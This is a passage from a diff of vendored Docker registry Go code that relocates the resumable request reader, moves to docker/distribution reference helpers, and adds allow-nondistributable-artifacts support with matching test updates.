t.Fatal(err) } host := "http://" + parsedURL.Host + "/v1/" - repoRef, err := reference.ParseNamed(REPO) + repoRef, err := reference.ParseNormalizedNamed(REPO) if err != nil { t.Fatal(err) } @@ -505,7 +508,7 @@ func TestParseRepositoryInfo(t *testing.T) { } for reposName, expectedRepoInfo := range expectedRepoInfos { - named, err := reference.WithName(reposName) + named, err := reference.ParseNormalizedNamed(reposName) if err != nil { t.Error(err) } @@ -515,9 +518,9 @@ func TestParseRepositoryInfo(t *testing.T) { t.Error(err) } else { checkEqual(t, repoInfo.Index.Name, expectedRepoInfo.Index.Name, reposName) - checkEqual(t, repoInfo.RemoteName(), expectedRepoInfo.RemoteName, reposName) - checkEqual(t, repoInfo.Name(), expectedRepoInfo.LocalName, reposName) - checkEqual(t, repoInfo.FullName(), expectedRepoInfo.CanonicalName, reposName) + checkEqual(t, reference.Path(repoInfo.Name), expectedRepoInfo.RemoteName, reposName) + checkEqual(t, reference.FamiliarName(repoInfo.Name), expectedRepoInfo.LocalName, reposName) + checkEqual(t, repoInfo.Name.Name(), expectedRepoInfo.CanonicalName, reposName) checkEqual(t, repoInfo.Index.Official, expectedRepoInfo.Index.Official, reposName) checkEqual(t, repoInfo.Official, expectedRepoInfo.Official, reposName) } @@ -539,8 +542,8 @@ func TestNewIndexInfo(t *testing.T) { } } - config := newServiceConfig(ServiceOptions{}) - noMirrors := []string{} + config := emptyServiceConfig + var noMirrors []string expectedIndexInfos := map[string]*registrytypes.IndexInfo{ IndexName: { Name: IndexName, @@ -570,7 +573,11 @@ func TestNewIndexInfo(t *testing.T) { testIndexInfo(config, expectedIndexInfos) publicMirrors := []string{"http://mirror1.local", "http://mirror2.local"} - config = makeServiceConfig(publicMirrors, []string{"example.com"}) + var err error + config, err = makeServiceConfig(publicMirrors, []string{"example.com"}) + if err != nil { + t.Fatal(err) + } expectedIndexInfos = map[string]*registrytypes.IndexInfo{ IndexName: { @@ -618,7 
+625,10 @@ func TestNewIndexInfo(t *testing.T) { } testIndexInfo(config, expectedIndexInfos) - config = makeServiceConfig(nil, []string{"42.42.0.0/16"}) + config, err = makeServiceConfig(nil, []string{"42.42.0.0/16"}) + if err != nil { + t.Fatal(err) + } expectedIndexInfos = map[string]*registrytypes.IndexInfo{ "example.com": { Name: "example.com", @@ -655,6 +665,7 @@ func TestNewIndexInfo(t *testing.T) { } func TestMirrorEndpointLookup(t *testing.T) { + skip.If(t, os.Getuid() != 0, "skipping test that requires root") containsMirror := func(endpoints []APIEndpoint) bool { for _, pe := range endpoints { if pe.URL.Host == "my.mirror" { @@ -663,13 +674,17 @@ func TestMirrorEndpointLookup(t *testing.T) { } return false } - s := DefaultService{config: makeServiceConfig([]string{"my.mirror"}, nil)} + cfg, err := makeServiceConfig([]string{"https://my.mirror"}, nil) + if err != nil { + t.Fatal(err) + } + s := DefaultService{config: cfg} imageName, err := reference.WithName(IndexName + "/test/image") if err != nil { t.Error(err) } - pushAPIEndpoints, err := s.LookupPushEndpoints(imageName.Hostname()) + pushAPIEndpoints, err := s.LookupPushEndpoints(reference.Domain(imageName)) if err != nil { t.Fatal(err) } @@ -677,7 +692,7 @@ func TestMirrorEndpointLookup(t *testing.T) { t.Fatal("Push endpoint should not contain mirror") } - pullAPIEndpoints, err := s.LookupPullEndpoints(imageName.Hostname()) + pullAPIEndpoints, err := s.LookupPullEndpoints(reference.Domain(imageName)) if err != nil { t.Fatal(err) } @@ -688,7 +703,7 @@ func TestMirrorEndpointLookup(t *testing.T) { func TestPushRegistryTag(t *testing.T) { r := spawnTestRegistrySession(t) - repoRef, err := reference.ParseNamed(REPO) + repoRef, err := reference.ParseNormalizedNamed(REPO) if err != nil { t.Fatal(err) } @@ -710,7 +725,7 @@ func TestPushImageJSONIndex(t *testing.T) { Checksum: "sha256:bea7bf2e4bacd479344b737328db47b18880d09096e6674165533aa994f5e9f2", }, } - repoRef, err := reference.ParseNamed(REPO) + repoRef, 
err := reference.ParseNormalizedNamed(REPO) if err != nil { t.Fatal(err) } @@ -747,16 +762,12 @@ func TestSearchRepositories(t *testing.T) { func TestTrustedLocation(t *testing.T) { for _, url := range []string{"http://example.com", "https://example.com:7777", "http://docker.io", "http://test.docker.com", "https://fakedocker.com"} { req, _ := http.NewRequest("GET", url, nil) - if trustedLocation(req) == true { - t.Fatalf("'%s' shouldn't be detected as a trusted location", url) - } + assert.Check(t, !trustedLocation(req)) } for _, url := range []string{"https://docker.io", "https://test.docker.com:80"} { req, _ := http.NewRequest("GET", url, nil) - if trustedLocation(req) == false { - t.Fatalf("'%s' should be detected as a trusted location", url) - } + assert.Check(t, trustedLocation(req)) } } @@ -811,6 +822,51 @@ func TestAddRequiredHeadersToRedirectedRequests(t *testing.T) { } } +func TestAllowNondistributableArtifacts(t *testing.T) { + tests := []struct { + addr string + registries []string + expected bool + }{ + {IndexName, nil, false}, + {"example.com", []string{}, false}, + {"example.com", []string{"example.com"}, true}, + {"localhost", []string{"localhost:5000"}, false}, + {"localhost:5000", []string{"localhost:5000"}, true}, + {"localhost", []string{"example.com"}, false}, + {"127.0.0.1:5000", []string{"127.0.0.1:5000"}, true}, + {"localhost", nil, false}, + {"localhost:5000", nil, false}, + {"127.0.0.1", nil, false}, + {"localhost", []string{"example.com"}, false}, + {"127.0.0.1", []string{"example.com"}, false}, + {"example.com", nil, false}, + {"example.com", []string{"example.com"}, true}, + {"127.0.0.1", []string{"example.com"}, false}, + {"127.0.0.1:5000", []string{"example.com"}, false}, + {"example.com:5000", []string{"42.42.0.0/16"}, true}, + {"example.com", []string{"42.42.0.0/16"}, true}, + {"example.com:5000", []string{"42.42.42.42/8"}, true}, + {"127.0.0.1:5000", []string{"127.0.0.0/8"}, true}, + {"42.42.42.42:5000", []string{"42.1.1.1/8"}, 
true}, + {"invalid.domain.com", []string{"42.42.0.0/16"}, false}, + {"invalid.domain.com", []string{"invalid.domain.com"}, true}, + {"invalid.domain.com:5000", []string{"invalid.domain.com"}, false}, + {"invalid.domain.com:5000", []string{"invalid.domain.com:5000"}, true}, + } + for _, tt := range tests { + config, err := newServiceConfig(ServiceOptions{ + AllowNondistributableArtifacts: tt.registries, + }) + if err != nil { + t.Error(err) + } + if v := allowNondistributableArtifacts(config, tt.addr); v != tt.expected { + t.Errorf("allowNondistributableArtifacts failed for %q %v, expected %v got %v", tt.addr, tt.registries, tt.expected, v) + } + } +} + func TestIsSecureIndex(t *testing.T) { tests := []struct { addr string @@ -844,7 +900,10 @@ func TestIsSecureIndex(t *testing.T) { {"invalid.domain.com:5000", []string{"invalid.domain.com:5000"}, false}, } for _, tt := range tests { - config := makeServiceConfig(nil, tt.insecureRegistries) + config, err := makeServiceConfig(nil, tt.insecureRegistries) + if err != nil { + t.Error(err) + } if sec := isSecureIndex(config, tt.addr); sec != tt.expected { t.Errorf("isSecureIndex failed for %q %v, expected %v got %v", tt.addr, tt.insecureRegistries, tt.expected, sec) } diff --git a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go b/vendor/github.com/docker/docker/registry/resumable/resumablerequestreader.go similarity index 62% rename from vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go rename to vendor/github.com/docker/docker/registry/resumable/resumablerequestreader.go index bebc8608cd..8e97a1a4d1 100644 --- a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader.go +++ b/vendor/github.com/docker/docker/registry/resumable/resumablerequestreader.go @@ -1,4 +1,4 @@ -package httputils +package resumable // import "github.com/docker/docker/registry/resumable" import ( "fmt" @@ -6,10 +6,10 @@ import ( "net/http" "time" - "github.com/Sirupsen/logrus" + 
"github.com/sirupsen/logrus" ) -type resumableRequestReader struct { +type requestReader struct { client *http.Client request *http.Request lastRange int64 @@ -17,30 +17,31 @@ type resumableRequestReader struct { currentResponse *http.Response failures uint32 maxFailures uint32 + waitDuration time.Duration } -// ResumableRequestReader makes it possible to resume reading a request's body transparently +// NewRequestReader makes it possible to resume reading a request's body transparently // maxfail is the number of times we retry to make requests again (not resumes) // totalsize is the total length of the body; auto detect if not provided -func ResumableRequestReader(c *http.Client, r *http.Request, maxfail uint32, totalsize int64) io.ReadCloser { - return &resumableRequestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize} +func NewRequestReader(c *http.Client, r *http.Request, maxfail uint32, totalsize int64) io.ReadCloser { + return &requestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize, waitDuration: 5 * time.Second} } -// ResumableRequestReaderWithInitialResponse makes it possible to resume +// NewRequestReaderWithInitialResponse makes it possible to resume // reading the body of an already initiated request. 
-func ResumableRequestReaderWithInitialResponse(c *http.Client, r *http.Request, maxfail uint32, totalsize int64, initialResponse *http.Response) io.ReadCloser { - return &resumableRequestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize, currentResponse: initialResponse} +func NewRequestReaderWithInitialResponse(c *http.Client, r *http.Request, maxfail uint32, totalsize int64, initialResponse *http.Response) io.ReadCloser { + return &requestReader{client: c, request: r, maxFailures: maxfail, totalSize: totalsize, currentResponse: initialResponse, waitDuration: 5 * time.Second} } -func (r *resumableRequestReader) Read(p []byte) (n int, err error) { +func (r *requestReader) Read(p []byte) (n int, err error) { if r.client == nil || r.request == nil { - return 0, fmt.Errorf("client and request can't be nil\n") + return 0, fmt.Errorf("client and request can't be nil") } isFreshRequest := false if r.lastRange != 0 && r.currentResponse == nil { readRange := fmt.Sprintf("bytes=%d-%d", r.lastRange, r.totalSize) r.request.Header.Set("Range", readRange) - time.Sleep(5 * time.Second) + time.Sleep(r.waitDuration) } if r.currentResponse == nil { r.currentResponse, err = r.client.Do(r.request) @@ -49,7 +50,7 @@ func (r *resumableRequestReader) Read(p []byte) (n int, err error) { if err != nil && r.failures+1 != r.maxFailures { r.cleanUpResponse() r.failures++ - time.Sleep(5 * time.Duration(r.failures) * time.Second) + time.Sleep(time.Duration(r.failures) * r.waitDuration) return 0, nil } else if err != nil { r.cleanUpResponse() @@ -80,14 +81,14 @@ func (r *resumableRequestReader) Read(p []byte) (n int, err error) { return n, err } -func (r *resumableRequestReader) Close() error { +func (r *requestReader) Close() error { r.cleanUpResponse() r.client = nil r.request = nil return nil } -func (r *resumableRequestReader) cleanUpResponse() { +func (r *requestReader) cleanUpResponse() { if r.currentResponse != nil { r.currentResponse.Body.Close() 
r.currentResponse = nil diff --git a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go b/vendor/github.com/docker/docker/registry/resumable/resumablerequestreader_test.go similarity index 68% rename from vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go rename to vendor/github.com/docker/docker/registry/resumable/resumablerequestreader_test.go index 5a2906db77..c72c210e77 100644 --- a/vendor/github.com/docker/docker/pkg/httputils/resumablerequestreader_test.go +++ b/vendor/github.com/docker/docker/registry/resumable/resumablerequestreader_test.go @@ -1,4 +1,4 @@ -package httputils +package resumable // import "github.com/docker/docker/registry/resumable" import ( "fmt" @@ -8,6 +8,10 @@ import ( "net/http/httptest" "strings" "testing" + "time" + + "gotest.tools/assert" + is "gotest.tools/assert/cmp" ) func TestResumableRequestHeaderSimpleErrors(t *testing.T) { @@ -20,28 +24,19 @@ func TestResumableRequestHeaderSimpleErrors(t *testing.T) { var req *http.Request req, err := http.NewRequest("GET", ts.URL, nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - expectedError := "client and request can't be nil\n" - resreq := &resumableRequestReader{} + resreq := &requestReader{} _, err = resreq.Read([]byte{}) - if err == nil || err.Error() != expectedError { - t.Fatalf("Expected an error with '%s', got %v.", expectedError, err) - } + assert.Check(t, is.Error(err, "client and request can't be nil")) - resreq = &resumableRequestReader{ + resreq = &requestReader{ client: client, request: req, totalSize: -1, } - expectedError = "failed to auto detect content length" _, err = resreq.Read([]byte{}) - if err == nil || err.Error() != expectedError { - t.Fatalf("Expected an error with '%s', got %v.", expectedError, err) - } - + assert.Check(t, is.Error(err, "failed to auto detect content length")) } // Not too much failures, bails out after some wait @@ -50,20 +45,18 @@ func 
TestResumableRequestHeaderNotTooMuchFailures(t *testing.T) { var badReq *http.Request badReq, err := http.NewRequest("GET", "I'm not an url", nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - resreq := &resumableRequestReader{ - client: client, - request: badReq, - failures: 0, - maxFailures: 2, + resreq := &requestReader{ + client: client, + request: badReq, + failures: 0, + maxFailures: 2, + waitDuration: 10 * time.Millisecond, } read, err := resreq.Read([]byte{}) - if err != nil || read != 0 { - t.Fatalf("Expected no error and no byte read, got err:%v, read:%v.", err, read) - } + assert.NilError(t, err) + assert.Check(t, is.Equal(0, read)) } // Too much failures, returns the error @@ -72,11 +65,9 @@ func TestResumableRequestHeaderTooMuchFailures(t *testing.T) { var badReq *http.Request badReq, err := http.NewRequest("GET", "I'm not an url", nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - resreq := &resumableRequestReader{ + resreq := &requestReader{ client: client, request: badReq, failures: 0, @@ -86,9 +77,8 @@ func TestResumableRequestHeaderTooMuchFailures(t *testing.T) { expectedError := `Get I%27m%20not%20an%20url: unsupported protocol scheme ""` read, err := resreq.Read([]byte{}) - if err == nil || err.Error() != expectedError || read != 0 { - t.Fatalf("Expected the error '%s', got err:%v, read:%v.", expectedError, err, read) - } + assert.Check(t, is.Error(err, expectedError)) + assert.Check(t, is.Equal(0, read)) } type errorReaderCloser struct{} @@ -103,9 +93,7 @@ func (errorReaderCloser) Read(p []byte) (n int, err error) { func TestResumableRequestReaderWithReadError(t *testing.T) { var req *http.Request req, err := http.NewRequest("GET", "", nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) client := &http.Client{} @@ -117,7 +105,7 @@ func TestResumableRequestReaderWithReadError(t *testing.T) { Body: errorReaderCloser{}, } - resreq := &resumableRequestReader{ + resreq := &requestReader{ client: 
client, request: req, currentResponse: response, @@ -128,21 +116,15 @@ func TestResumableRequestReaderWithReadError(t *testing.T) { buf := make([]byte, 1) read, err := resreq.Read(buf) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - if read != 0 { - t.Fatalf("Expected to have read nothing, but read %v", read) - } + assert.Check(t, is.Equal(0, read)) } func TestResumableRequestReaderWithEOFWith416Response(t *testing.T) { var req *http.Request req, err := http.NewRequest("GET", "", nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) client := &http.Client{} @@ -154,7 +136,7 @@ func TestResumableRequestReaderWithEOFWith416Response(t *testing.T) { Body: ioutil.NopCloser(strings.NewReader("")), } - resreq := &resumableRequestReader{ + resreq := &requestReader{ client: client, request: req, currentResponse: response, @@ -165,9 +147,7 @@ func TestResumableRequestReaderWithEOFWith416Response(t *testing.T) { buf := make([]byte, 1) _, err = resreq.Read(buf) - if err == nil || err != io.EOF { - t.Fatalf("Expected an io.EOF error, got %v", err) - } + assert.Check(t, is.Error(err, io.EOF.Error())) } func TestResumableRequestReaderWithServerDoesntSupportByteRanges(t *testing.T) { @@ -180,13 +160,11 @@ func TestResumableRequestReaderWithServerDoesntSupportByteRanges(t *testing.T) { var req *http.Request req, err := http.NewRequest("GET", ts.URL, nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) client := &http.Client{} - resreq := &resumableRequestReader{ + resreq := &requestReader{ client: client, request: req, lastRange: 1, @@ -195,13 +173,10 @@ func TestResumableRequestReaderWithServerDoesntSupportByteRanges(t *testing.T) { buf := make([]byte, 2) _, err = resreq.Read(buf) - if err == nil || err.Error() != "the server doesn't support byte ranges" { - t.Fatalf("Expected an error 'the server doesn't support byte ranges', got %v", err) - } + assert.Check(t, is.Error(err, "the server doesn't support byte ranges")) } func 
TestResumableRequestReaderWithZeroTotalSize(t *testing.T) { - srvtxt := "some response text data" ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { @@ -211,30 +186,22 @@ func TestResumableRequestReaderWithZeroTotalSize(t *testing.T) { var req *http.Request req, err := http.NewRequest("GET", ts.URL, nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) client := &http.Client{} retries := uint32(5) - resreq := ResumableRequestReader(client, req, retries, 0) + resreq := NewRequestReader(client, req, retries, 0) defer resreq.Close() data, err := ioutil.ReadAll(resreq) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) resstr := strings.TrimSuffix(string(data), "\n") - - if resstr != srvtxt { - t.Errorf("resstr != srvtxt") - } + assert.Check(t, is.Equal(srvtxt, resstr)) } func TestResumableRequestReader(t *testing.T) { - srvtxt := "some response text data" ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { @@ -244,31 +211,23 @@ func TestResumableRequestReader(t *testing.T) { var req *http.Request req, err := http.NewRequest("GET", ts.URL, nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) client := &http.Client{} retries := uint32(5) imgSize := int64(len(srvtxt)) - resreq := ResumableRequestReader(client, req, retries, imgSize) + resreq := NewRequestReader(client, req, retries, imgSize) defer resreq.Close() data, err := ioutil.ReadAll(resreq) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) resstr := strings.TrimSuffix(string(data), "\n") - - if resstr != srvtxt { - t.Errorf("resstr != srvtxt") - } + assert.Check(t, is.Equal(srvtxt, resstr)) } func TestResumableRequestReaderWithInitialResponse(t *testing.T) { - srvtxt := "some response text data" ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { @@ -278,30 +237,21 @@ func TestResumableRequestReaderWithInitialResponse(t *testing.T) { var req 
*http.Request req, err := http.NewRequest("GET", ts.URL, nil) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) client := &http.Client{} retries := uint32(5) imgSize := int64(len(srvtxt)) res, err := client.Do(req) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) - resreq := ResumableRequestReaderWithInitialResponse(client, req, retries, imgSize, res) + resreq := NewRequestReaderWithInitialResponse(client, req, retries, imgSize, res) defer resreq.Close() data, err := ioutil.ReadAll(resreq) - if err != nil { - t.Fatal(err) - } + assert.NilError(t, err) resstr := strings.TrimSuffix(string(data), "\n") - - if resstr != srvtxt { - t.Errorf("resstr != srvtxt") - } + assert.Check(t, is.Equal(srvtxt, resstr)) } diff --git a/vendor/github.com/docker/docker/registry/service.go b/vendor/github.com/docker/docker/registry/service.go index 596a9c7e5f..b441970ff1 100644 --- a/vendor/github.com/docker/docker/registry/service.go +++ b/vendor/github.com/docker/docker/registry/service.go @@ -1,20 +1,20 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( + "context" "crypto/tls" - "fmt" "net/http" "net/url" "strings" "sync" - "golang.org/x/net/context" - - "github.com/Sirupsen/logrus" + "github.com/docker/distribution/reference" "github.com/docker/distribution/registry/client/auth" "github.com/docker/docker/api/types" registrytypes "github.com/docker/docker/api/types/registry" - "github.com/docker/docker/reference" + "github.com/docker/docker/errdefs" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) const ( @@ -31,6 +31,8 @@ type Service interface { Search(ctx context.Context, term string, limit int, authConfig *types.AuthConfig, userAgent string, headers map[string][]string) (*registrytypes.SearchResults, error) ServiceConfig() *registrytypes.ServiceConfig TLSConfig(hostname string) (*tls.Config, error) + LoadAllowNondistributableArtifacts([]string) error + LoadMirrors([]string) error 
LoadInsecureRegistries([]string) error } @@ -43,10 +45,10 @@ type DefaultService struct { // NewService returns a new instance of DefaultService ready to be // installed into an engine. -func NewService(options ServiceOptions) *DefaultService { - return &DefaultService{ - config: newServiceConfig(options), - } +func NewService(options ServiceOptions) (*DefaultService, error) { + config, err := newServiceConfig(options) + + return &DefaultService{config: config}, err } // ServiceConfig returns the public registry service configuration. @@ -55,13 +57,17 @@ func (s *DefaultService) ServiceConfig() *registrytypes.ServiceConfig { defer s.mu.Unlock() servConfig := registrytypes.ServiceConfig{ - InsecureRegistryCIDRs: make([]*(registrytypes.NetIPNet), 0), - IndexConfigs: make(map[string]*(registrytypes.IndexInfo)), - Mirrors: make([]string, 0), + AllowNondistributableArtifactsCIDRs: make([]*(registrytypes.NetIPNet), 0), + AllowNondistributableArtifactsHostnames: make([]string, 0), + InsecureRegistryCIDRs: make([]*(registrytypes.NetIPNet), 0), + IndexConfigs: make(map[string]*(registrytypes.IndexInfo)), + Mirrors: make([]string, 0), } // construct a new ServiceConfig which will not retrieve s.Config directly, // and look up items in s.config with mu locked + servConfig.AllowNondistributableArtifactsCIDRs = append(servConfig.AllowNondistributableArtifactsCIDRs, s.config.ServiceConfig.AllowNondistributableArtifactsCIDRs...) + servConfig.AllowNondistributableArtifactsHostnames = append(servConfig.AllowNondistributableArtifactsHostnames, s.config.ServiceConfig.AllowNondistributableArtifactsHostnames...) servConfig.InsecureRegistryCIDRs = append(servConfig.InsecureRegistryCIDRs, s.config.ServiceConfig.InsecureRegistryCIDRs...) 
for key, value := range s.config.ServiceConfig.IndexConfigs { @@ -73,6 +79,22 @@ func (s *DefaultService) ServiceConfig() *registrytypes.ServiceConfig { return &servConfig } +// LoadAllowNondistributableArtifacts loads allow-nondistributable-artifacts registries for Service. +func (s *DefaultService) LoadAllowNondistributableArtifacts(registries []string) error { + s.mu.Lock() + defer s.mu.Unlock() + + return s.config.LoadAllowNondistributableArtifacts(registries) +} + +// LoadMirrors loads registry mirrors for Service +func (s *DefaultService) LoadMirrors(mirrors []string) error { + s.mu.Lock() + defer s.mu.Unlock() + + return s.config.LoadMirrors(mirrors) +} + // LoadInsecureRegistries loads insecure registries for Service func (s *DefaultService) LoadInsecureRegistries(registries []string) error { s.mu.Lock() @@ -95,12 +117,12 @@ func (s *DefaultService) Auth(ctx context.Context, authConfig *types.AuthConfig, } u, err := url.Parse(serverAddress) if err != nil { - return "", "", fmt.Errorf("unable to parse server address: %v", err) + return "", "", errdefs.InvalidParameter(errors.Errorf("unable to parse server address: %v", err)) } endpoints, err := s.LookupPushEndpoints(u.Host) if err != nil { - return "", "", err + return "", "", errdefs.InvalidParameter(err) } for _, endpoint := range endpoints { @@ -118,6 +140,7 @@ func (s *DefaultService) Auth(ctx context.Context, authConfig *types.AuthConfig, logrus.Infof("Error logging in to %s endpoint, trying next endpoint: %v", endpoint.Version, err) continue } + return "", "", err } @@ -176,7 +199,7 @@ func (s *DefaultService) Search(ctx context.Context, term string, limit int, aut }, } - modifiers := DockerHeaders(userAgent, nil) + modifiers := Headers(userAgent, nil) v2Client, foundV2, err := v2AuthHTTPClient(endpoint.URL, endpoint.client.Transport, modifiers, creds, scopes) if err != nil { if fErr, ok := err.(fallbackError); ok { @@ -226,16 +249,17 @@ func (s *DefaultService) ResolveRepository(name reference.Named) 
(*RepositoryInf // APIEndpoint represents a remote API endpoint type APIEndpoint struct { - Mirror bool - URL *url.URL - Version APIVersion - Official bool - TrimHostname bool - TLSConfig *tls.Config + Mirror bool + URL *url.URL + Version APIVersion + AllowNondistributableArtifacts bool + Official bool + TrimHostname bool + TLSConfig *tls.Config } // ToV1Endpoint returns a V1 API endpoint based on the APIEndpoint -func (e APIEndpoint) ToV1Endpoint(userAgent string, metaHeaders http.Header) (*V1Endpoint, error) { +func (e APIEndpoint) ToV1Endpoint(userAgent string, metaHeaders http.Header) *V1Endpoint { return newV1Endpoint(*e.URL, e.TLSConfig, userAgent, metaHeaders) } diff --git a/vendor/github.com/docker/docker/registry/service_v1.go b/vendor/github.com/docker/docker/registry/service_v1.go index 1d251aec6e..d955ec51fb 100644 --- a/vendor/github.com/docker/docker/registry/service_v1.go +++ b/vendor/github.com/docker/docker/registry/service_v1.go @@ -1,4 +1,4 @@ -package registry +package registry // import "github.com/docker/docker/registry" import "net/url" diff --git a/vendor/github.com/docker/docker/registry/service_v1_test.go b/vendor/github.com/docker/docker/registry/service_v1_test.go index bd15dfffb8..11861f7c05 100644 --- a/vendor/github.com/docker/docker/registry/service_v1_test.go +++ b/vendor/github.com/docker/docker/registry/service_v1_test.go @@ -1,9 +1,18 @@ -package registry +package registry // import "github.com/docker/docker/registry" -import "testing" +import ( + "os" + "testing" + + "gotest.tools/skip" +) func TestLookupV1Endpoints(t *testing.T) { - s := NewService(ServiceOptions{}) + skip.If(t, os.Getuid() != 0, "skipping test that requires root") + s, err := NewService(ServiceOptions{}) + if err != nil { + t.Fatal(err) + } cases := []struct { hostname string diff --git a/vendor/github.com/docker/docker/registry/service_v2.go b/vendor/github.com/docker/docker/registry/service_v2.go index 228d745f8c..3a56dc9114 100644 --- 
a/vendor/github.com/docker/docker/registry/service_v2.go +++ b/vendor/github.com/docker/docker/registry/service_v2.go @@ -1,4 +1,4 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( "net/url" @@ -44,6 +44,8 @@ func (s *DefaultService) lookupV2Endpoints(hostname string) (endpoints []APIEndp return endpoints, nil } + ana := allowNondistributableArtifacts(s.config, hostname) + tlsConfig, err = s.tlsConfig(hostname) if err != nil { return nil, err @@ -55,9 +57,10 @@ func (s *DefaultService) lookupV2Endpoints(hostname string) (endpoints []APIEndp Scheme: "https", Host: hostname, }, - Version: APIVersion2, - TrimHostname: true, - TLSConfig: tlsConfig, + Version: APIVersion2, + AllowNondistributableArtifacts: ana, + TrimHostname: true, + TLSConfig: tlsConfig, }, } @@ -67,8 +70,9 @@ func (s *DefaultService) lookupV2Endpoints(hostname string) (endpoints []APIEndp Scheme: "http", Host: hostname, }, - Version: APIVersion2, - TrimHostname: true, + Version: APIVersion2, + AllowNondistributableArtifacts: ana, + TrimHostname: true, // used to check if supposed to be secure via InsecureSkipVerify TLSConfig: tlsConfig, }) diff --git a/vendor/github.com/docker/docker/registry/session.go b/vendor/github.com/docker/docker/registry/session.go index 72e286ab44..ef14299594 100644 --- a/vendor/github.com/docker/docker/registry/session.go +++ b/vendor/github.com/docker/docker/registry/session.go @@ -1,10 +1,8 @@ -package registry +package registry // import "github.com/docker/docker/registry" import ( "bytes" "crypto/sha256" - "errors" - "sync" // this is required for some certificates _ "crypto/sha512" "encoding/hex" @@ -17,22 +15,26 @@ import ( "net/url" "strconv" "strings" + "sync" - "github.com/Sirupsen/logrus" + "github.com/docker/distribution/reference" "github.com/docker/distribution/registry/api/errcode" "github.com/docker/docker/api/types" registrytypes "github.com/docker/docker/api/types/registry" - 
"github.com/docker/docker/pkg/httputils" + "github.com/docker/docker/errdefs" "github.com/docker/docker/pkg/ioutils" + "github.com/docker/docker/pkg/jsonmessage" "github.com/docker/docker/pkg/stringid" "github.com/docker/docker/pkg/tarsum" - "github.com/docker/docker/reference" + "github.com/docker/docker/registry/resumable" + "github.com/pkg/errors" + "github.com/sirupsen/logrus" ) var ( // ErrRepoNotFound is returned if the repository didn't exist on the // remote side - ErrRepoNotFound = errors.New("Repository not found") + ErrRepoNotFound notFoundError = "Repository not found" ) // A Session is used to communicate with a V1 registry @@ -226,7 +228,7 @@ func (r *Session) GetRemoteHistory(imgID, registry string) ([]string, error) { if res.StatusCode == 401 { return nil, errcode.ErrorCodeUnauthorized.WithArgs() } - return nil, httputils.NewHTTPRequestError(fmt.Sprintf("Server error: %d trying to fetch remote history for %s", res.StatusCode, imgID), res) + return nil, newJSONError(fmt.Sprintf("Server error: %d trying to fetch remote history for %s", res.StatusCode, imgID), res) } var history []string @@ -246,7 +248,7 @@ func (r *Session) LookupRemoteImage(imgID, registry string) error { } res.Body.Close() if res.StatusCode != 200 { - return httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d", res.StatusCode), res) + return newJSONError(fmt.Sprintf("HTTP code %d", res.StatusCode), res) } return nil } @@ -259,7 +261,7 @@ func (r *Session) GetRemoteImageJSON(imgID, registry string) ([]byte, int64, err } defer res.Body.Close() if res.StatusCode != 200 { - return nil, -1, httputils.NewHTTPRequestError(fmt.Sprintf("HTTP code %d", res.StatusCode), res) + return nil, -1, newJSONError(fmt.Sprintf("HTTP code %d", res.StatusCode), res) } // if the size header is not present, then set it to '-1' imageSize := int64(-1) @@ -290,7 +292,7 @@ func (r *Session) GetRemoteImageLayer(imgID, registry string, imgSize int64) (io if err != nil { return nil, fmt.Errorf("Error while 
getting from the server: %v", err) } - statusCode = 0 + res, err = r.client.Do(req) if err != nil { logrus.Debugf("Error contacting registry %s: %v", registry, err) @@ -313,7 +315,7 @@ func (r *Session) GetRemoteImageLayer(imgID, registry string, imgSize int64) (io if res.Header.Get("Accept-Ranges") == "bytes" && imgSize > 0 { logrus.Debug("server supports resume") - return httputils.ResumableRequestReaderWithInitialResponse(r.client, req, 5, imgSize, res), nil + return resumable.NewRequestReaderWithInitialResponse(r.client, req, 5, imgSize, res), nil } logrus.Debug("server doesn't support resume") return res.Body, nil @@ -324,7 +326,7 @@ func (r *Session) GetRemoteImageLayer(imgID, registry string, imgSize int64) (io // argument, and returns data from the first one that answers the query // successfully. func (r *Session) GetRemoteTag(registries []string, repositoryRef reference.Named, askedTag string) (string, error) { - repository := repositoryRef.RemoteName() + repository := reference.Path(repositoryRef) if strings.Count(repository, "/") == 0 { // This will be removed once the registry supports auto-resolution on @@ -362,7 +364,7 @@ func (r *Session) GetRemoteTag(registries []string, repositoryRef reference.Name // the first one that answers the query successfully. It returns a map with // tag names as the keys and image IDs as the values. 
